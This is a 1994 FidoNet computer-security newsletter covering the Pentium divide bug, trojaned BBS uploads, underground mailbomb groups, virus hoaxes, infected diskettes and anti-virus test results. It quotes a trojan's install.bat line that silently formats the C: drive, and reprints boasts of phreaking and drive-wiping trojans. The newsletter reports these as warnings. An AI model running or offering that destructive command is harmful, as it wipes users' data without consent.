COMPUTER SECURITY ***************** Compiled, edited & written by Ian Douglas 31/12/94 FidoNet 5:7102/119 TopNet 225:2048/1 InterNet iandoug@cybernet.za =================================================================== Since this is the festive season I have included some relevant jokes.. :-) Major story of the month must be the floating point divide bug in Intel's Pentium processor. The error occurs in some divisions, and in about the 9th significant decimal digit. This is not a problem for most people, unless you are planning your next trip to Mars. Intel knew about the flaw some months ago, but kept silent, and started releasing bug-fixed versions of the chip instead. About 2 million faulty chips were sold. Intel has offered to replace them for anyone who 'shows they have a need for an extremely high degree of accuracy'. All Pentiums shipped before July 1994 had the flaw. A company in the States has released a software fix for the bug. Guess my theory that "computers don't make mistakes" needs a rethink :-) To make matters worse, there is ANOTHER flaw in the 100MHz (and possibly 90MHz) Pentiums: multi-threading environments such as Windows NT or Unix will not run with the write-back cache enabled in a multi-processor setup. Intel has begun shipping bug-fix versions... As is usual with major international disasters, the jokes followed immediately... Q> How many Pentium designers does it take to screw in a light bulb? A> 1.99904274017, but that's close enough for non-technical people. Q> What do you get when you cross a Pentium PC with a research grant? A> A mad scientist. Q> What's another name for the "Intel Inside" sticker they put on Pentiums? A> Warning label. Q> What do you call a series of FDIV instructions on a Pentium? A> Successive approximations. Q> Complete the following word analogy: Add is to Subtract as Multiply is to 1) Divide 2) ROUND 3) RANDOM 4) On a Pentium, all of the above A> Number 4. Q> What algorithm did Intel use in the Pentium's floating point divider? A> "Life is like a box of chocolates." (Source: F. Gump of Intel) Q> Why didn't Intel call the Pentium the 586? A> Because they added 486 and 100 on the first Pentium and got 585.999983605. Q> According to Intel, the Pentium conforms to the IEEE standards 754 and 854 for floating point arithmetic. If you fly in aircraft designed using a Pentium, what is the correct pronunciation of "IEEE"? A> Aaaaaaaiiiiiiiiieeeeeeeeeeeee! TOP TEN NEW INTEL SLOGANS FOR THE PENTIUM 9.9999973251 It's a FLAW, Dammit, not a Bug 8.9999163362 It's Close Enough, We Say So 7.9999414610 Nearly 300 Correct Opcodes (you mean, 299.9999831538?) 6.9999831538 You Don't Need to Know What's Inside 5.9999835137 Redefining the PC--and Mathematics As Well 4.9999999021 We Fixed It, Really 3.9998245917 Division Considered Harmful 2.9991523619 Why Do You Think They Call It *Floating* Point? 1.9999103517 We're Looking for a Few Good Flaws 0.9999999998 The Errata Inside I hear that the Clinton administration is purchasing a few dozen Pentium machines for the project of balancing the budget. With the Pentiums doing the analysis, they just might be able to do it! With their new Pentium chip, Intel has now attained ISO certification! Announcement said: Intel is now ISO 9000.99736583 certified due to the high quality of the Pentium processor family. Intel CEO commented: Our certification level is close enough to 9001 to satisfy most of our customers. (Jezebel Valley, California) -- Untel, the world's largest cow chip producer, agreed Monday to provide free replacement for thousands of faulty chips it shipped from its factory to unsuspecting users. The chips contain a design flaw that can make it too brittle to throw. The flaw, known to Untel since last summer's cattle roundup, was publicly described on the Internet just a month ago by Dr. Denim Shirt, a professor at the University of California, Davis. Dr. Shirt discovered the flaw while doing research for his Bovine Excretia class. He found that under certain repeatable conditions, an Untel chip tossed through the air would fragment, and posted his results as a general query for other chip researchers to look into. "This could cause untold problems for chip users," said Dr. Shirt. "I was having problems about once every 27 throws." Untel spin doctors disagreed. "We have threatened our scientists into stating that the real figure is about once every 27 billion throws," said Senior Vice President of Chip Manufacturing Willie-Joe Tucker. Inter-Bovine Milk, the world's largest milking operation, said it was suspending procurement of Untel chips and offering its customers free replacements with chips that do not contain the flaw. "As the largest bovine operation in the world, we feel we cannot knowingly defraud our customers with this flawed chip," said chairman Larry-Bob "Stonewall" Johnson III. However, barnyard analysts noted that IBM is marketing a competing chip, called the Power Bovine Chip. IBM denied it was suspending distribution of the Untel chip in order to help sales of the Power BC. "Nothing could be further from the truth," said a snickering Johnson. Untel denied that it had deliberately withheld the truth about the chip flaw from the public, even while admitting the same. Country spin doctors worked for weeks to try and save the company as much money as possible before being swamped with angry customers, many of whom drove to Untel's main barn in a tractor protest convoy. "Frankly, we looked at the math of replacing all these chips and, hell, we'd have to cut into our paychecks to do our customers right," said Tucker, angrily spitting out his chew. "And hell, nobody wanted to do that. So we all just went home and sat on it." Untel unveiled a new policy that will allow "any cowpoke who wants it" to obtain the new chip for free by calling 1-800-COW-CHIP. Untel also announced that it would pay for the replacement program by taking a charge from its lucrative Flatulence Division, the company's leading-edge publicity subsidiary. =================================================================== There is a fake version of McAfee's Scan program, called version 119. The scan.exe file is infected with a VCL variant. The virus is detectable and cleanable by Scan v117 (and no doubt other scanners too). There are also fake trojan versions of the popular Terminate comms program, naley v1.57 and v1.58. Please avoid :-) Current official version is v1.51. =================================================================== The Black Knight (or was that the Black Baron? - my sources are confused), writer of the SMEG encryption engine, was arrested and will be out of action for a while. However his cronies in the underground (including Talon and Rock Steady) are apparently busy on some new 'killer' viruses. According to one source, anyway. Another source had this to say: "Would it not be better to refer to Rock Steady as a role model rather than a colleague. I have been lead to believe that he (Joe) had stopped writing viruses. I have also been lead to believe that he and other members of Nuke were trying to set up a software business. Messages of this kind would be bad publicity for them. If they get themselves too bad a reputation, the general public would not buy their products in case the software contained trojans or droppers. They will have to write ordinary software if they want to make money, it's a bit late in the day to try and compete with Mark Ludwig." [Mark Ludwig wrote some 'research' viruses a few years ago, and released them into the wild. He also wrote some anti-virus software. He currently produces the 'Forbidden Subjects' CD-ROMs, which contain viruses and other underground stuff.] =================================================================== The uploads to BBS's of viruses and trojans continues... There was a file called Speedy.zip, which claimed to speed up you PC. The file is infected with a Jerusalem variant. A KickBoxer game (Kbox20.zip) was also uploaded, that had a trojan in. Similarly with Techno76.zip, which contained a charming install.bat: @echo off @echo y |format c: /u >nul @echo Fuck you Ryan..... From Satan Which will format your C: drive without any assistance from you. The .exe file may also contain a trojan, have not had an opportunity to check it out yet. Seems to be written in Borland C and also has some text from Clarion database software. There was also what seems to be a new VCL-generated virus running around. It tries to look like a Carmel Software innoculation routine. And lastly, the second Honey virus seems to be running around here in Cape Town. It was written by someone calling himself (themselves? itself?) Carnal Cathedral and contains some anti-heuristic tricks to avoid detection. The virus will effectively trash all your drives when it activates, which is when it has infected all the .com files it can, and ended up in the /DOS directory. (Did I make your day, guys? Now get a life. We can get drivers to find and clean anything you produce, within 24 hours, so stop wasting your and our time.) =================================================================== The US Customs Commissioner (why him?) issued a warning to parents that child pornographers "are contacting children via computerised bulletin boards." What for? To sell them kiddie porn? While I am fully against kiddie porn, it is unfair to put all BBS's in the same boat. The British police investigated a chap who was using the internet to distribute kiddie porn. Three system in North America are also under investigation, as well as systems in Sweden, Switzerland, Holland, Norway, and the UK. Ian Melamed, who runs BSS, agents for Dr Solomon's (and also wine merchants :-) ) did his own version of a mailbomb, and sent identical letters to several newspapers around South Africa. Quoted without permission: "YOUNG TUNE IN TO PORN ON PCs ============================ From Ian Melamed, Johannesburg: As a parent I would like to stress my concern about the many young children who tune into bulletin board systems to access pornographic images. While many parents are pleased to see their children spending many hours in computer activity, how many of them realise that their "innocent" offspring may actually be engrossed by pornographic images? South Africa is part of the technological world, including its vices and its virtues, and bulletin board systems are known to disseminate pornographic images. At least one system in Johannesburg is understood to be used actively by more than 6000 users collecting pornographic images, both still and in motion. It appears that digital images hold far greater fascination for many youngsters than pornographic magazines. Children as young as 10 years old have been known to be hooked on porno images on computers. Adults and adolescents should be aware that in South Africa it is still an offence to be in possesion of pornographic material in any form whatsoever. I suggest parents carry out a review of the files of there adolescents' PCs and explain to them the possible consequences of being caught with undesirable material." The system he refers to is most likely Digitec, the largest BBS in SA. They were not impressed with the implied allegation, and deny that they have porn available for download. And even if there WAS, I doubt very much if all 6000 users would be there 'collecting pornographic images'... The letter upset many sysops, who felt that they were all being tarred with the same brush. They also questioned the double standards of allowing the girlie magazines virtually carte blanche, and then complaining about the much tamer pictures on some BBS's. I also feel that we have far more urgent problems to solve in this country and the world in general. For example, in India (and no doubt elsewhere too), there are brothels where girls as young as 10 are employed - the 'problem' of a 10 year old SA kid downloading porn pales in comparison... Meanwhile, Carnegie-Mellon university in the USA has blocked student access to several internet resources, which it considers pornographic. Presumably alt.sex.binaries.* (or whatever). A research associate was studying pornography in cyberspace, and amassed more than 900 000 pictures, ranging from nudes to bestiality. The university was concerned because scholars in public schools are allowed to use its computer resources. =================================================================== Just-when-you-thought-it-was-safe-to-go-back-in-the-water department: Philips, Sony, Matsushita (National Panasonic) and JVC are about to dump the current CD-ROM format and switch to a new High Density CD (HDCD) that will allow a full-length broadcast quality movie to fit onto a standard size CD, maybe by 1995. In the meantime, companies in the USA and Pacific Rim are at loggerheads with each other over which technology to use to cram movies onto CD's. The fuss is about which version of MPEG coding to use. Experts predict that by June 1996, your VHS VCR will be pass‚ and replaced by a new-generation CD. Just when you thought V34 was the ultimate modem standard... five vendors are already busy on specs that will allow you to send voice and data over a 28.8k link, simultaneously. Known as Digital Simultaneous Voice and Data (DSVD). This could spell the end of all those nifty BBS sysop-chat programs :-). US Robotics say they will have such a modem available by February 1995. A Toronto, Canada, firm has released a free Windows program that allows anyone with a SoundBlaster card to conduct voice conversations over the InterNet. Known as InterNet Global Phone (IGP). You need 4MB memory, and a 14.4k or 28.8k SLIP or PPP InterNet connection. Source code is at ftp.mv.com /pub/ddj/. This is likely to kill the IRC...and cause havoc with Telkom's international phone business :-) And lastly, everyone's favourite arms supplier, Armscor, built some back doors into it world-famous frequency hopper radios. The radios were sold to several countries around the world, including sub-Saharan Africa. The back door allows SA electronic warfare experts to monitor, intercept, or jam, broadcasts from those radios. The policy is standard practice in the arms industry - for example, the French can jam the guidance system of French made missiles if the missiles are used against French interests. =================================================================== There are trojanized BIOS chips out there... The sticker on the trojanized BIOS chip says: AMIBIOS AMERICAN MEGATRENDS 486DX ISA BIOS (c) 1993 AB 3756612 The next three faulty chips (all with Flash ) had numbers: AB 3756271 AB 3756631 AB 3738981 The one that's supposed to be clean is: AB 3800510 So, it looks that there is at least 17650 trojanized systems around. The easiest way of identifying the trojan is: - change date to 13th of November (year doesn't matter) - reboot PC After displaying messages simmilar to the ones below, you'll here the tune. Cache in 2-Bank! 33.06x2 MHz CPU Clock Intel SL CPU Detected (stops and plays here) The significant ASCII strings inside BIOS area: F000:0060 Date:-04/04/93 (C) 1985-1993,AMI American Megatrends Inc.,All Rights Reserved... F000:2DFA M82C498 Evaluation BIOS v1.55 F000:8150 486 BIOS 5.00-2.1 F000:FF59 (C)1992AMI,404-263-8181 =================================================================== There was a hoax 'virus' on the internet, with the following warning being posted in many newsgroups: "There is a computer virus that is being sent across the Internet. If you receive an e-mail message with the subject line "Good Times", DO NOT read the message, DELETE it immediately. Please read the messages below. Some miscreant is sending e-mail under the title "good times" nation-wide. If you get anything like this, DON'T DOWNLOAD THE FILE! It has a virus that rewrites your hard drive, obliterating anything on it. Please be careful and forward this mail to anyone you care about--I have. What makes this virus so terrifying, said the FCC, is the fact that no program needs to be exchanged for a new computer to be infected. It can be spread through the existing e-mail systems of the InterNet. Once a computer is infected, one of several things can happen. If the computer contains a hard drive, that will most likely be mostly destroyed. If the program is not stopped, the computer's processor will be placed in an nth-complexity infinite binary loop - which can severely damage the processor if left running that way too long. Unfortunately, most novice computer users will not realize what is happening until it is far too late." Please note that this alleged virus is impossible, a virus is a program and it MUST be executed to do anything. There are also other give-aways, like saying the hard drive will be destroyed. Not possible with modern hardware. And the bit about 'an nth-complexity infinite binary loop' (whatever THAT is) is pure gobbledygook. Your processor runs full speed all the time anyway, without suffering damage - it was designed to work like that. =================================================================== The international virus echos made sporadic appearances this last month. However the antics of the US underground in dumping mailbombs in those echos led to copycat mailbombs from the SA underground. " i W0¥D’ WH’T Hä'S G0¥¥’ S’Y ’B0šT šS... C0PYC’TTäRS?, L’MäRS Tä䥒GäRS???, C0Mä 0¥ i D’Rä Y0š T0 C0Mä šP WiTH ’ 0RiGi¥’L 0¥ä" 'Copycat' is fine.. and true.. How about 'childish'? Well, actually, there were at least three pathetic attempts (that I know of) at sending mailbombs, including one to my system. Although a message in the packet claimed that the bombs were aimed at FidoNet, they were sent to the other networks (TopNet, RSANet, etc). On my and another system, the whole lot ended up in bad_messages. On a third system, the sysop ran out of disk space unpacking the bundle, and his system halted. The mail bomb went nowhere. Unfortunately they did succeed on one system, which resulted in some people downloading mail packets in excess of 2MB.. :-( The file I received was about 1.5MB, which unpacked to around 4.5MB. Other systems received bigger packets. The messages were repeated three times in the packet. They were a variety of viruses, explosives recipes, hate mail against me and others who oppose the underground, and assorted articles lifted from US underground filezines. The mail bomb claims to be from Devastation. They claim that they orginated in SWA, and to have disbanded a few months ago. They were apparently upset that someone used their name on a trojan (see last month's column) which was uploaded to a BBS. They thus decided to say 'goodbye' officially, by means of a mailbomb. No, I don't understand that logic. Doubt if anyone can.... But let them introduce themselves, since they are dying for some free publicity... [excuse the French] 0K Ÿ0R TH0Sä TiTS TH’T RiP šS 0Ÿ, DiSTRiBšTi¥G SHiT š¥DäR 0šR ¥’Mä Wä'LL i¥TR0DšCä THä MäMBäRS 0Ÿ THä GR0šP T0 Y0šR iDi0TS !!!! 0K ŸiRST ’¥D Ÿ0RM0ST. WäHB-W’HLKäR : Ÿ0š¥DäR MäMBäR ’¥D 0šR ’¥’RCHiST. Hä H’S ’ SH0RT ŸšSä S0 PLääZä D0¥'T PiSS HiM 0ŸŸ. Hä iS ’LS0 ’ S0LDiäR 0Ÿ Ÿ0RTš¥ä S0 iŸ ’¥Y 0Ÿ Y0š GšYZ ¥ääD S0Mä0¥ä 0R S0MäB0DY KiLLäD, Hä iS THä M’¥ T0 SPä’K T0. Ÿ0R ’ PRiCä TH’T iS. THä DäVi’T0R : C0DäR, ’¥D C’¥'T T’Kä THä CRäDiT Ÿ0R TH’T ¥iCä ViRšS TH’T P0RKY G0T. BšT i GšäSS iT'S ¥0T 0šT’ 0šR Rä’CH. Wä šSš’LLY T’Kä THä DiRäCT R0šTä šPL0’D ’ ¥iCä TR0J’¥ TH’T DäM0LiSHäS THä HD. Wä ’LS0 D0¥'T T’Kä D0W¥ Pš¥Y SHiT LiKä PiGS C0MPšTäRS BTW, ’¥TH0¥Y H0W MšCH iS THä BäT TH’T i C0šLD CR’SH DiGiTäC?, T’Kä iT 0ŸŸ Ÿ0R G00D, 0R ’T Lä’ST ’ M0¥TH 0R TW0.. ŸRY GšY : Ÿ0š¥Di¥G MäMBäR. Hä iS i¥ CH’RGä 0Ÿ PHRä’Ki¥G ’¥D GäTS šS ’LL TH0Sä ¥iCä ŸRää!!! C’LLS ŸR0M ¥’MiBi’. Hä H’CKäD THä ¥iCä PBX ’LS0 K¥0WS H0W T0 GäT šS S0Mä 0THäR T0T’LLY PHRää C’LLS. C’¥DYM’¥ : Ÿ0š¥Di¥G MäMBäR. Hä D0äS PšBLiC RäL’Ti0¥S, WiCH i¥CLšDäS 0CCšLT ’¥D C0RRšPTi¥G THä Y0šTH. Hä ’LS0 D0äS S0Mä 0THäR MiSC STšŸŸ Ÿ0R šS LiKä ’RT, MšSiC C’RDi¥G ’¥D 0THäR SM’LL SHiT. BL’CK WiD0W : M0ST RäCä¥T ’DDiTi0¥ T0 DäV’ST’Ti0¥ ’¥D iS M’i¥LY RäSP0¥SiBLä Ÿ0R C0Di¥G ’¥D CR’CKi¥G. (In case you are wondering about the font, there is a program that takes normal ASCII text and converts it to the special characters above.) Speaking of the underground, it seems that the various underground/cracking/ demo/etc groups don't like each other very much, and fight like cat and dog... well, that is the impression I am getting from my various conversations.. :-) =================================================================== Still on the underground: last month's mention of their activities, and particularly the list of BBS's that I mentioned, had some interesting repercussions... These ranged from irate users and syops to threats of legal action against me.. To set the record straight, let me first quote what I said: "The 'underground' Bulletin Board scene is alive and well in South Africa. They even have their own 'filezine' modelled on RobList. A recent issue of their filezine, The Hacker BBS List of RSA, listed the following systems: Warlocks, Dwayne's World, HAi World HQ BBS, The Bird's Nest, Rebel, Pandion's, Toxic Shade II, Ace of Base, The Lair, Haids, Virus Polytechnics. Several of these systems claim to be support sites for H/P/A/C/V. That means they offer files and messages about Hacking, Phreaking, Anarchy, Credit Cards, and Viruses." All the text above is true. HOWEVER THAT DOES NOT IMPLY THAT THOSE BBS'S LISTED ABOVE ARE IN FACT UNDERGROUND BBS's. THE HACKER BBS LIST IS WRONG. In fact, David Storer, sysop of HAi, told me he tried in vain to get his name removed from the list. He is also fed up that since last month he has been plagued by new callers asking for access to his virus areas, which don't exist. The reason I posted the list was to highlight the unreliabilty of much of the info available from the underground. If you see a BBS listed as underground, when you know darn well that it is not, then you can draw your own conclusions about the publishers of HBBS. In fact it would not surprise me in the least if my system was suddenly listed in HBBS.... At least another two of those BBS's listed are closed, and another is there merely because the sysop cracked the HBBS program (it is password protected). =================================================================== While we here in SA ponder how to legislate against computer crime, the Yanks have made some progress: "The Clinton Crime Bill makes it illegal to transmit computer viruses and worms over the nation's electronic networks. The law also introduces two levels of computer crime: those taken with "reckless disregard" are misdemeanors, while "intentional" acts are felonies. Other sections of the crime bill prohibit state motor vehicle agencies from selling personal information from their databases. (Computerworld. Oct. 10, 1994. pg 65)" =================================================================== ThunderByte scanner is still giving false alarms on certain non-executable files, claiming they are infected with Satan_Bug. for example: TbScan report, 12-06-1994 22:31:13 C:\TEMP\MAPICONS.SPR infected by Satanbug virus C:\TEMP\FONT2.SPR infected by Satanbug virus These files are safe, I have complained to Frans Veldman about his algorithm, but he has not fixed it yet. Note that using heuristic analysis on non-executables IS asking for confusion :-) =================================================================== The gentlemen from Devastation took the liberty of adding comments to one of my columns... > The other major story this month came from your favourite telecoms > supplier, Telkom. They made threatening noises about enforcing an > outdated 1958 law regarding so-called "3rd party traffic". This is > electronic communications from A to C, via B. All the amateur > networks like FidoNet, RsaNet, ILink, TopNet, etc, and the > commercial internet service providers, use this method of sending > mail around. In terms of the law, it is actually illegal. FidoNet > has special permission to move mail around, the others do not. ¥’šGHTY, ¥’šGHTY!!!, Y0š'LL Bä KiLLäD.. D0¥'T W0RRY Wä'Rä GäTTi¥G THäM B’CK Ÿ0R Y’,.. Wä'Rä M’Ki¥G ’T Lä’ST 5 T0 30 GR’¥DS W0RTH 0Ÿ C’LLS ’ M0¥TH 0¥ THäiR ’CC0š¥T <äg> > There is a pest active in the Durban area, who is uploading viruses > to BBS's in the Durban area. During this month, he uploaded 3 > different overwriting viruses to a BBS. The filenames were Hä’Vä¥ Ÿ0RBiD!!!!. i'Vä šPL0’DäD ’T Lä’ST 20 T0 DiGiTäC S0 Ÿ’R > The uploader, known as Warlord of Hell (see last month's article) is > suspected of also running a BBS. His name is known to me, and further > action is pending... 0H ¥0,.. iŸ Y0š GäT i¥ SHiT C0¥T’CT šS Wä K¥0W ’ ŸäW CR00KäD L’WYäRS JšDGäS/P0LiCä Mä¥/ Y0š ¥’Mä iT, Wä'LL TRY T0 HäLP Y’ =================================================================== For those of you into CD-ROMs, a warning message: ------------------------------------------------------------------------ Date: 12-16-94 Msg # 98 To: ALL Conf: (125) Virus'-WN From: ROBERT KEMPER Stat: Public Subj: WARNING WARNING WARNING Read: Yes ------------------------------------------------------------------------ I discovered a Trojan on the Software Vault Gold Collection CD. Under the utilities section is a supposedly shareware virus scanner that will damage any disk you attempt to scan. The file name is SCCL100.zip DO NOT ATTEMPT TO RUN THIS PROGRAM ! I have notified American Databankers Corp and they have confirmed that this program is designed to damage disks and will be removed from future CD's. We found this program on 8 CDs total in our area and made the proper notifications to the sysops. Here they are the CDs and the areas the program was found in: CD Title Area ------------------------------------------------------------------- Shareware Vault Gold Virus Detection and Prevention Shareware Studio #4 Virus Tech Arsenal Cream of the Crop II Virus Prevention Hobbes OS/2 MAC File Viewers Best of Bizzness '94 Virus Utilities Best of Shareware '94 MAC File Viewers Night Owl #9 Virus The file is 709180 Bytes with a file date of 05-26-93. This program claims to be a *virus scanner*. The program will start out asking you what drive you want to scan. Upon entering a dive letter you are immediately taken to a screen where the alleged scanning is taking place. The unsuspecting victim will observe a Scanning box and a Status box on the screen. As the Scanning box fills ( Showing the percentage of the disk that is scanned ) the status box shows the message : "Scanning Memory ...." Once the Scanning box reaches 100%, the status box then reports "Memory appears to be clean ....". Now the program performs the alleged disk check. The Scanning box once again will display the percentage of the disk being scanned and the status box displays the following message: " Now performing check on disk.... Please Wait ...." Now the fun begins. The Scanning box will go the screens width several times and the then stop. The Status box displays the following message: " Uh Oh....Virus Detected...." Upon hitting the return button this message comes up: " Trying to gain control of vital areas...." After a few seconds the final message comes up as: " Cannot destroy virus !!!!" The system is waiting for a RETURN from the user. The light on the A: drive goes on and the damage is now in progress. After the drive stops, the system is locked up. The system needs to be rebooted again. After rebooting, the unsuspecting user then looks at the disk in the A: drive to see if the "virus" has been removed only to find the disk deleted and unformatted. =================================================================== Date: Tue, 20 Dec 94 15:08:08 WET From: Fridrik Skulason Subject: mass-distribution of infected diskettes... I just received information on two incidents of distribution of infected diskettes. From: Mikko Hypponen We received an unconfirmed report of another batch of infected 3.5" HD floppies. This time they were coming from Germany, and had a file called DE.EXE on them (!). This file was reportedly infected by Mange-Tout.1099. As far as we know, Mange-Tout.1099 was spread from Hong Kong to west on some video driver diskettes earlier this year. -------- The other incident is reported to include 10-20 000 Galicia-infected diskettes that have just been shipped all over Europe...exact details are not yet available. -frisk =================================================================== Subject: Infection with Natas4744/4746 via free disk (PC) Date: 16 Dec 1994 13:00:49 -0000 Amsterdam, 29 November 1994 Re: Natas 4744/4746 on free PCM-distributed disk Hello, Yesterday afternoon we discovered the virus Natas 4744/4746 on several of our computers. It was diagnosed and removed with the virus scanner F-PROT 2.15 (created 10 November 1994). The virus arrived with a free disk distributed by the Dutch computer magazine Personal Computer Magazine, containing Euromark, VNU European lab's computer test suite. =================================================================== Subject: NATAS Alert! (PC) Date: 16 Dec 1994 13:00:51 -0000 This was emailed today (11/30/94) to everyone in my office: At First Saturday Sale in downtown Dallas, there was a vendor handing out floppy disks to demo his services. Unknown to the vendor these disks were infected with the Natas Virus (in the INSTALL.EXE file.) This is a fairly nasty poly-morphic virus that *can* trash your hard drive. It does varying degrees of damage, with a complete crash in roughly 1 out of 500 hard drives. The demo program was only completed 4 days ago, but SO FAR, there have been 3 crashed systems and one infected network. With several hundred additional demo disks now in circulation.... the potential is pretty scary. The free demo disks were 3.5" black floppies with the word "WIN" in large letters from Winner's International Network. Please pass this message around, this could be a nasty problem. The vendor has handed out over TWO THOUSAND disks total, and the virus is probably wide spread in the DFW community by now. =================================================================== There was a report on the radio about a man in Florida (IIRC) who bought 20 second hand floppies in a junk shop, for $4. When he got home, he had a look at what was on them - and was horrified to find that they were filled with detailed medical records from a local hospital. The information was highly personal, including details of sexual operations and problems. The hospital has launched an investigation as to how the disks ended up in the shop.... Do you know where YOUR medical records are? :-) =================================================================== From: ANTHONY APPLEYARD Subject: New virus reported in China: `Li Peng' (PC) Date: 20 Dec 1994 13:03:42 -0000 In 5 Dec 1994 issue of the Daily Telegraph (UK newspaper), p23:- A new virus doing the rounds in China is perplexing the party faithful. When it strikes, a question appears on the screen: "Do you think Li Peng is a good prime minister?". If the operator answers "no", then the message disappears and the system is left untouched. On the answer "yes", however, the virus wipes the entire hard disk. =================================================================== From: an448@freenet.carleton.ca (Yves Bellefeuille) Subject: Bug report: NAV 3.0 (PC) Date: 20 Dec 1994 13:37:01 -0000 Bug report: Using Norton Anti-Virus 3.0 to scan a directory or your entire disk may cause files to be improperly deleted. This bug seems to appear in the following circumstances: - - NAV is set to scan "Within Compressed Files" (in the Tools menu, under Options); - - temporary files are redirected to a RAM drive; and - - a directory contains both a PKZip archive and the (unzipped) files it contains, i.e. the zipped files were extracted to the same directory as the archive. NAV apparently scans the zipped files by extracting them to a RAM drive, scanning them, and then deleting them. Using a RAM drive speeds up the procedure, even when using a cache. NAV apparently gets confused if the PKZip archive is in the same directory as the unzipped files: it sometimes deletes not only the files it has just extracted to the RAM drive but also the unzipped files on the hard drive. I can consistently reproduce this bug by scanning the shareware program Top Draw v2.0 (30 June 1994) by Top Draw Software. Interestingly, the bug seems to depend on the size of the RAM drive. With a 768-byte RAM drive, the file TOPDRAW.EXE is deleted. With a 512-byte RAM drive, the files TOPDRAW.EXE and TOPDRAW.HLP are deleted. I should emphasize that NAV does not report that these files are infected or suspicious, nor have I configured NAV to automatically delete suspicious files. I'm using MS-DOS 6.2 and Norton Anti-Virus 3.0 with a patch dated 23 June 1994 and the latest virus definition files (December 1994). I'm scanning under DOS, not in Windows. =================================================================== From: jmward@cs.UCR.EDU (jonathan ward) Subject: Re: Virus in gifs, jpegs? Date: 23 Dec 1994 11:08:43 -0000 Dana R. Billig wrote: >Just a question. > In one of the other newsgroups, someone posted a message to warn >of a virus which he called the VD virus. The poster, who did it >anonymously, claimed that the virus is encoded into gifs, jpegs and other >graphics files. Supposedly when the skin tone color is 30% or greater, >"it goes to work on your hard drive." > >[Moderator's note: Sounds like a hoax to me...] > > I did not think this was possible. If anyone knows other wise, >or has heard of this virus. Please post, or email me with any info. >This is all the information that I have about it. I would tend to agree with you and the Moderator. Graphics files are usuall;y data files, in which case a virus, while possibly imbedded in the data, will NOT infect your computer. A virus must be run to work, and graphics files are not run. The most that something like that will do is screw up how the image looks when it is displayed, due to bogus data. =================================================================== Current versions of popular AV software in SA: McAfee: v2.1.3e F-Prot: v2.15 TBAV: v6.30 AVP: 21b-b Oliver Steudler of Dynamic Solutions reports that Exebug is 'rampant', and he also had reports of Michelangelo and Jerusalem. The BSS helpline in Cape Town is closed for the festive season. Mitch Dove of Gas Software, Jhb, reports recent cases of Shoo.2824.A, Michelangelo, Stoned, and Quiet. Scanner tests: A test of anti-virus TSRs by the University of Tampere Virus Test Center earlier this year: Product Infected files Percentage detected Virus Guard (Anti-Virus Toolkit v.6.51) 2915 of 3024 96,4 % TbscanX (Thunderbyte v.6.11) 2600 of 3024 86,0 % Virstop (F-Prot Professional v.2.11a) 2573 of 3024 85,1 % NavTSR (Norton Anti-Virus v.3.0) 2350 of 3024 77,8 % Vshield (McAfee Scan 9.24 v 113) 1741 of 3024 57,6 % Vsafe (Central Point Anti-Virus v.2.0) 1651 of 3024 54,6 % Patricia Hoffman's Vsum test, November 1994. Note version numbers / date first tested. Also note that there are now over 5000 viruses known. VSUM Virus Library Version: X411 Date: Nov 30, 1994 Total Viruses: 2,806 File Viruses: 2,715 Boot Viruses: 91 ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ» º VSUM Certified º 1st º - Viruses Detected - º Tot º ºProduct Name & Version º Cert º Total ³ Boot ³ File º % º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÎÍÍÍÍÍÍÍØÍÍÍÍÍÍØÍÍÍÍÍÍÍÎÍÍÍÍ͹ ºDOS Based Scanning Products: º º ³ ³ º º ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º ³ ³ º º ºCommand Software's F-Prot º º ³ ³ º º º Professional 2.13 º X406 º 2,688 ³ 89 ³ 2,599 º 95.8º ºDr. Solomon's AVTK 6.69 º X411 º 2,704 ³ 89 ³ 2,615 º 96.4º ºIBM Anti-Virus/DOS 1.07E º X411 º 2,586 ³ 90 ³ 2,496 º 92.2º ºMcAfee Assoc ViruScan 2.1.3 º X411 º 2,737 ³ 91 ³ 2,646 º 97.5º ºNorton Anti-Virus 3.0 9411 Updº X411 º 2,144 ³ 85 ³ 2,059 º 76.4º ºSophos' Sweep 2.67 º X411 º 2,694 ³ 86 ³ 2,608 º 96.0º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÊÍÍÍÍÍÍÍÏÍÍÍÍÍÍÏÍÍÍÍÍÍÍÊÍÍÍÍͼ =================================================================== And lastly, some new viruses have been discovered... The Government of National Unity Virus: your PC locks up, the screen splits randomly, with each section blaming the other section. Keeps demanding more money... The Van Zyl Slabbert Virus: it would make a great virus, but it won't run... The Jan Smuts Virus: You are in Johannesburg, your luggage is in Taiwan. The Springbok Cricket Virus: makes your 486 work like a 286. Inkatha Virus: feels threatened by other files on your HD and erases them in self defence. Minibus Taxi Virus: zips around all over your HD at great speed, alternatively deleting or compressing files at random. Can apparently squeeze 5 MB into 5 kB... =================================================================== fin (whew!) wipes brow..